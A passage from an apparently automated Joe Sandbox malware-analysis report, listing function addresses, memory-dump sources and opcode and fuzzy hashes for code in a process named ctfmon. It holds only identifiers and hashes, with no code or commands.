                                                    • Instruction Fuzzy Hash: 8EC1E970E19A1D8FDB98EF58C8A4BADB7B1FF58304F5041A9E01DD7299CB34A981CB40
                                                    Function 00007FFD9C1DF39A Relevance: .3, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26184017ea2fa26a07e4f701ac6431a1c59c3f9e84722c0c55e24ade43dd6925
                                                    • Instruction ID: 1b8e64bfb5718a6153f5cbceabca73439c7213190b0230c2e8412fff14c158c4
                                                    • Opcode Fuzzy Hash: 26184017ea2fa26a07e4f701ac6431a1c59c3f9e84722c0c55e24ade43dd6925
                                                    • Instruction Fuzzy Hash: FDB1E531A0CA478FE759DF68C4A06A0B7B0FF15354F5442B9D04EC7A96EB38B951CB84
                                                    Function 00007FFD9C1D329A Relevance: .3, Instructions: 309COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 599d305bff2d74b1439f923199a3701b46f63c4151ee0e928ea94b9d53861827
                                                    • Instruction ID: ce1fe1d0f39a363329ba43aacbd0b0e17c77c41ef6e30eb3c33dc0ac09159a4a
                                                    • Opcode Fuzzy Hash: 599d305bff2d74b1439f923199a3701b46f63c4151ee0e928ea94b9d53861827
                                                    • Instruction Fuzzy Hash: 2CB1E831B1DA878FD759DB68C0A05B0B7B0FF59350F9442B9D04ECBA86DB28B851C794
                                                    Function 00007FFD9BAE837D Relevance: .3, Instructions: 305COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d09860b0d63e8e9a832ed3bd447b2543928f152280d2c2e1e7683aba25fb8bc
                                                    • Instruction ID: eefb2ec3c893a5bfe28b793cd4476e669a10e2faec73e39e95a05050140f67e7
                                                    • Opcode Fuzzy Hash: 9d09860b0d63e8e9a832ed3bd447b2543928f152280d2c2e1e7683aba25fb8bc
                                                    • Instruction Fuzzy Hash: 16B1A13190D78D8FDB55EF68C8656ED7BB0FF19310F0501AAE848C71A2DB38AA55CB42
                                                    Function 00007FFD9C41957A Relevance: .3, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 766115908f8597b747fc044ffd2c90cad58efd92660897409f449365f2e9256e
                                                    • Instruction ID: 8a363454902260ca206ce48923051f63ee22bc0557720b52ffe7146e809df49a
                                                    • Opcode Fuzzy Hash: 766115908f8597b747fc044ffd2c90cad58efd92660897409f449365f2e9256e
                                                    • Instruction Fuzzy Hash: 37B1A970A18A5D8FDBA8EB58C8A5BE9B7B1FF68344F5045E9D04DD3291CE346A80CF41
                                                    Function 00007FFD9C1DE886 Relevance: .3, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc6d3b73210481da90561d6e70887cacb0843fab7a7f32fa444400d74a78b30a
                                                    • Instruction ID: 9a4fe4b357f6c262e8b7d9d4171e9e2f2736f200fcbc5e93fe97b2b1f90f8735
                                                    • Opcode Fuzzy Hash: dc6d3b73210481da90561d6e70887cacb0843fab7a7f32fa444400d74a78b30a
                                                    • Instruction Fuzzy Hash: A0817832F0DB034FE7799A68946517577F0EF463D2B1606BED48ED3282EE28B8028755
                                                    Function 00007FFD9C1D2776 Relevance: .3, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7cfa81faddb5f46ddc0f59dff8e12aff809c24dee29230c87653c626419043f3
                                                    • Instruction ID: 8a8944c77a22a802f01203c164aeba98ecb02b6e5749ffa642ec10cdcd710dbf
                                                    • Opcode Fuzzy Hash: 7cfa81faddb5f46ddc0f59dff8e12aff809c24dee29230c87653c626419043f3
                                                    • Instruction Fuzzy Hash: C3811232F0CB578FE7395A68946517577F0EF91390B14067EE0AAD3283EA28BC428795
                                                    Function 00007FFD9C1D0BA9 Relevance: .3, Instructions: 252COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16bf22d094caf9ee747168b4dd8d869196436b38301a0c94549ed52bd373699d
                                                    • Instruction ID: 37731f9c3e2e006a058a78536558437b57a69f8504df43cc37c8786dca09a2e3
                                                    • Opcode Fuzzy Hash: 16bf22d094caf9ee747168b4dd8d869196436b38301a0c94549ed52bd373699d
                                                    • Instruction Fuzzy Hash: 83713732E0C94B4FE778DA58A8665B937E0FF44350B5403B9D09ED75B2FE18A806C789
                                                    Function 00007FFD9C1DBABB Relevance: .2, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c109ee6b14741b5835897698743ec8435bb6dc74e2f349c88a88a2dd98a3a22e
                                                    • Instruction ID: 8de29eec4ba1b6a9f47722f85e229555f29dc92cd558de58e50ad6567d779040
                                                    • Opcode Fuzzy Hash: c109ee6b14741b5835897698743ec8435bb6dc74e2f349c88a88a2dd98a3a22e
                                                    • Instruction Fuzzy Hash: CD71B532E1C64F8EEB65DBA488619BC77B0FF55380F1006BAD00FEB1D5EE2868818744
                                                    Function 00007FFD9C1E0AD1 Relevance: .2, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bd2cb0c28bbb91d6b73ca3018e74684a4296af7f54386dd025d377216219586
                                                    • Instruction ID: 517d09f5460da9d8b2da9b17d8a77320df6a5de39b5c98ab608bd0246a557f3b
                                                    • Opcode Fuzzy Hash: 6bd2cb0c28bbb91d6b73ca3018e74684a4296af7f54386dd025d377216219586
                                                    • Instruction Fuzzy Hash: 3C81D131A08B078FE378DB54C1A057177F1FF54344B9049BEC48AD7AA2CA39B882CB85
                                                    Function 00007FFD9C1D147B Relevance: .2, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d04eefa89b3de10f0a62ddbce0660f0c240623e5fb272dd908953c19976c1ec3
                                                    • Instruction ID: 2e4c9b6a945516ed3e3ed975e965b3a607399cf7ebe28b4185c24c6c818562f7
                                                    • Opcode Fuzzy Hash: d04eefa89b3de10f0a62ddbce0660f0c240623e5fb272dd908953c19976c1ec3
                                                    • Instruction Fuzzy Hash: 7E719232E1C64B8EEB69DBA484645BC7BB1FF45360F6406B9D00FE71C1EE286841C705
                                                    Function 00007FFD9BB1AB50 Relevance: .2, Instructions: 221COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c889cfccc0c94364bffb328fd8ac4154e5c08a2be4209a6dcfa65b576ed1af1
                                                    • Instruction ID: 21d33c9efe06bc9dcb60d3e6cdca0b71d607a7679ed6c1e4327dad55a55a543f
                                                    • Opcode Fuzzy Hash: 8c889cfccc0c94364bffb328fd8ac4154e5c08a2be4209a6dcfa65b576ed1af1
                                                    • Instruction Fuzzy Hash: 5D818E3090978D8FCB92EF64C8689EA7BF0FF15304F0545ABD458C71A2DB38AA58CB51
                                                    Function 00007FFD9BAE812D Relevance: .2, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e59c308cc9d155e20c778a605f008afb63da60d118f00f20c851a88f30f0e185
                                                    • Instruction ID: 52ba96d81746212ff6e2fed36800e2540004ae3612a9869faeb3caa72a4ea49c
                                                    • Opcode Fuzzy Hash: e59c308cc9d155e20c778a605f008afb63da60d118f00f20c851a88f30f0e185
                                                    • Instruction Fuzzy Hash: 4081DF30A0964D8FCF84EF68D894AED7BF1FF59310F0541AAE818E7261D674E954CB81
                                                    Function 00007FFD9BAE91D0 Relevance: .2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0841a19bbe44436c5f183f006116a512ca6096a9a7123e7d9bf8aefa170cf695
                                                    • Instruction ID: eed8f83a725d8ede3a257fc0860693d0e6706382f820ba10ea98b0d43d3c8400
                                                    • Opcode Fuzzy Hash: 0841a19bbe44436c5f183f006116a512ca6096a9a7123e7d9bf8aefa170cf695
                                                    • Instruction Fuzzy Hash: B951903091978D8FDB95EF688868AE97FF0FF16304F0541EBD458C71A2DA34A594CB41
                                                    Function 00007FFD9BB0ABF0 Relevance: .2, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2cdbb95bd988a82437884321b61663e46c93dd84cc7711582e51d1f9bcf9c9d9
                                                    • Instruction ID: 6f5ab10e40dadc96933ba979feab8bac067641fc999406d4d2c8a6e8ef5c31a7
                                                    • Opcode Fuzzy Hash: 2cdbb95bd988a82437884321b61663e46c93dd84cc7711582e51d1f9bcf9c9d9
                                                    • Instruction Fuzzy Hash: 6551BE3091D68D8FDB65DF64C8687EA7BB0FF05305F0541AAD848C71E6DB38A698CB81
                                                    Function 00007FFD9C1DD1B5 Relevance: .2, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b4a13d50e7040c4180f6920e99ed1d083cbce1c0fd6c2f3190fe6f6a8213cab
                                                    • Instruction ID: 0cad6006db6a16c7e9987720a2aca3b6c75533d921a7b244984b25f3a0936a2d
                                                    • Opcode Fuzzy Hash: 7b4a13d50e7040c4180f6920e99ed1d083cbce1c0fd6c2f3190fe6f6a8213cab
                                                    • Instruction Fuzzy Hash: 8D51C423F1D55B8FEB64EBAC88616ED7BB0FF45390F040276D04AE71D6EA286801C758
                                                    Function 00007FFD9BAEF1D8 Relevance: .2, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c44998c41d80ce2e154ab7da6b0232d0f88d83a46b7fb96a35969c5fc9ebab6f
                                                    • Instruction ID: 70979e95c395e1b92c55a2a3960540f8b3bbc83aefc85a46e59a3fcee23e717d
                                                    • Opcode Fuzzy Hash: c44998c41d80ce2e154ab7da6b0232d0f88d83a46b7fb96a35969c5fc9ebab6f
                                                    • Instruction Fuzzy Hash: A851D07590E3CA8FE7238B6498253E93FB0EF17314F0A40EBC494DB1A3D6695A19C752
                                                    Function 00007FFD9BB0AC40 Relevance: .1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a4c516abb586a265961b9953f485c960ec7faf051ac9632f9bde674945d1a8c
                                                    • Instruction ID: ce2e59eaa513fb1addfcb2760210adc61063b9dc0a8e4b391a10cb78ecb54944
                                                    • Opcode Fuzzy Hash: 3a4c516abb586a265961b9953f485c960ec7faf051ac9632f9bde674945d1a8c
                                                    • Instruction Fuzzy Hash: AE41D03091968D8FDB65EF64C8687EA7BF0FF15305F0501AAD448C71E6DB38A698CB81
                                                    Function 00007FFD9BAE7439 Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 964678e7f5cca5693194e8980f8f060c5708217b3d596b6b529d9748c4d5f394
                                                    • Instruction ID: 94f438adc8174a0253ec48bcde742b90895d16275cb2dc5d0142cbf9d2377147
                                                    • Opcode Fuzzy Hash: 964678e7f5cca5693194e8980f8f060c5708217b3d596b6b529d9748c4d5f394
                                                    • Instruction Fuzzy Hash: FE513C3090968D8FDB95EF68C859AE97FB0FF19300F0541EAE858C71A2DB74E994CB41
                                                    Function 00007FFD9C4137B5 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5afb1793bf19d31c0b56c324aca32c321f575eb751afc2f5c962315a786884e6
                                                    • Instruction ID: 3dcfc322fdcb70ad72a08e6dd81a367d376d0963a61beb9a9e846aec41a5a107
                                                    • Opcode Fuzzy Hash: 5afb1793bf19d31c0b56c324aca32c321f575eb751afc2f5c962315a786884e6
                                                    • Instruction Fuzzy Hash: 58415D30A0865E8FDBA5DB9888A17E87BF1FF59354F0041A9D48DD2192DE38B989CF41
                                                    Function 00007FFD9C1DFE20 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6023c350179d2508286c2555e86013584849c9ecc7c0b62e7bed44ab612f9a6
                                                    • Instruction ID: 125bd48b2264f56d10374a4e8e52c1c2796c56068d0396f57d4a68acbda8813c
                                                    • Opcode Fuzzy Hash: d6023c350179d2508286c2555e86013584849c9ecc7c0b62e7bed44ab612f9a6
                                                    • Instruction Fuzzy Hash: 3441D321E1C85F8EEB78DA5C88616F877B1EF54340F1442BAD04ED7587ED38AA818B45
                                                    Function 00007FFD9C1D4FF7 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c99aaf0469332f24c52001fbd216882f72c8135abe4818f57bff0e19ea1cd9cd
                                                    • Instruction ID: 9ee832d68a4b2ffa45fe2be0bd7f706d914b0ec4ede463a2391f16d2de9081fb
                                                    • Opcode Fuzzy Hash: c99aaf0469332f24c52001fbd216882f72c8135abe4818f57bff0e19ea1cd9cd
                                                    • Instruction Fuzzy Hash: 4D41833260C949CFDFACEF18C465DA477E1FBA8324B0402AAD04ED7596DE25EC45CB85
                                                    Function 00007FFD9C1DC42C Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1be6b2c10101d33ac48bed871be26ba2aaf4a1ac9b3b7e54517b8eb3aa6b44d1
                                                    • Instruction ID: 21d2dd3d19a5e4bbda0b4700b6f530cd4d9a25ed29a2b1b001db3c6994715c69
                                                    • Opcode Fuzzy Hash: 1be6b2c10101d33ac48bed871be26ba2aaf4a1ac9b3b7e54517b8eb3aa6b44d1
                                                    • Instruction Fuzzy Hash: 01411832A4E3C64FE3179374D8259F97FB0EF83364F0402FAE0899A0A3E6595516C746
                                                    Function 00007FFD9BAEB0BA Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b31e8739956e0afb1b0101fa2a534e8e817c27f40e3e789442f3d086aa72e8c7
                                                    • Instruction ID: 1fb956b2234c3163fe1846fc9cc3955d4863a2044f7dabcd17f71285d050f9e1
                                                    • Opcode Fuzzy Hash: b31e8739956e0afb1b0101fa2a534e8e817c27f40e3e789442f3d086aa72e8c7
                                                    • Instruction Fuzzy Hash: C3413170A0991D8FDFA8EF58C895BA9B7A1FF54300F1046B9D01DD31A5DE35A981CF40
                                                    Function 00007FFD9BAEC5CB Relevance: .1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56ed7ef5720f162d9675fa3db6e62b2770300be970023fb2b300c960dbf34d68
                                                    • Instruction ID: 32a359b22042d8f93cbd1b81ba8f3b33200ca3baf2f939fd9b78d745830c94c3
                                                    • Opcode Fuzzy Hash: 56ed7ef5720f162d9675fa3db6e62b2770300be970023fb2b300c960dbf34d68
                                                    • Instruction Fuzzy Hash: B341EF71E0991D8FDBA8DB58C895AA9B7B2FF98304F5042E9D00DD7295DE34AD81CF80
                                                    Function 00007FFD9C1D09E9 Relevance: .1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2daa60d2d476d2b70398003da49c95367d4de5f9ff5d8916c660379f5850b4d
                                                    • Instruction ID: dbdb561f48002a4c8fd8e4eea05a10fd4e6669ececcbf5f1239fc7e70dcac4f8
                                                    • Opcode Fuzzy Hash: a2daa60d2d476d2b70398003da49c95367d4de5f9ff5d8916c660379f5850b4d
                                                    • Instruction Fuzzy Hash: C2310423E0D14B8AF739569458315B937B0EF823A0F9407BAE44EA70E3ED0C3811D29A
                                                    Function 00007FFD9C1D50A1 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 339635cacb4e3f30259ace97f18d6ac39260d7a5483e002ebfcecd28ea6bc6b3
                                                    • Instruction ID: 2c892b29116ed4d607671dcbf397a2a9cb05f0b639f74601afa156a5e52bf159
                                                    • Opcode Fuzzy Hash: 339635cacb4e3f30259ace97f18d6ac39260d7a5483e002ebfcecd28ea6bc6b3
                                                    • Instruction Fuzzy Hash: 10319F3260C9458FDBACEF18C465EA477E1FBA832470402AAD04ED7196DE25E844CB85
                                                    Function 00007FFD9C1DD214 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4cbfe403c28d7de30d0436ad8d456473bc010f5851001ecd46e219bcb1bcdf9
                                                    • Instruction ID: 69de1e0118ad668c3f901744071036c2f89ccafce387cede26db2943e9677ee6
                                                    • Opcode Fuzzy Hash: b4cbfe403c28d7de30d0436ad8d456473bc010f5851001ecd46e219bcb1bcdf9
                                                    • Instruction Fuzzy Hash: E8413272E1C90F9FEB64EB98C861AFDB7B1FF54350F500239D00AA7195EE3468418754
                                                    Function 00007FFD9C1D503B Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fc980fff45d3fc120ffbd9efe8bdd53baa27eb14ce9e92de052fb4ced491a22
                                                    • Instruction ID: 0bc25f80712b729e6a641938857119fd8a42e02708b8ee897b56fb4b47584c01
                                                    • Opcode Fuzzy Hash: 0fc980fff45d3fc120ffbd9efe8bdd53baa27eb14ce9e92de052fb4ced491a22
                                                    • Instruction Fuzzy Hash: A931B13260C909CFDBACEF18C4A5EA477E1FFA8314B0402A9D04ED7196DE25E845CB85
                                                    Function 00007FFD9C1DD33A Relevance: .1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7285a046009294eb8d89cbf32803f0c8fd0314d713716625017569d22850c74
                                                    • Instruction ID: 5cea92c6cda2924b470da79701b8d2426ed5955b6b5b5422f681af1167463b1f
                                                    • Opcode Fuzzy Hash: a7285a046009294eb8d89cbf32803f0c8fd0314d713716625017569d22850c74
                                                    • Instruction Fuzzy Hash: 2B310412E0E6C61FE7276B7858646A43FB1DF57250B4D42FAE08DDB0D7E91CA809C352
                                                    Function 00007FFD9C1DC46A Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47a416da989e0fce9c70299c07e57ddb20fdbc4458c1d689fc4d2b4ce696484e
                                                    • Instruction ID: 0031f8b34c27887fdb143e2f36781c83e65de2f89ceff7efc9983e3beed295a1
                                                    • Opcode Fuzzy Hash: 47a416da989e0fce9c70299c07e57ddb20fdbc4458c1d689fc4d2b4ce696484e
                                                    • Instruction Fuzzy Hash: 9C310722E4E3C68FE713937498746E93FB16F43364F1801EAE085DE0E3EA990515C756
                                                    Function 00007FFD9C1D215D Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
